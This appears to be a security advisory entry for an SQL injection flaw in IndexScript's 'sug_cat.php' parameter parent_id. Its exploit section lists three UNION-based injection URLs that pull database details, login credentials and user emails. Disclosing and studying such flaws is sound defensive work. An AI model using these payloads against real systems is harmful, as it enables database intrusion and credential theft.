• info
• discussion
• exploit
• solution
• references

IndexScript 'sug_cat.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--

http://www.example.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--

http://www.example.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--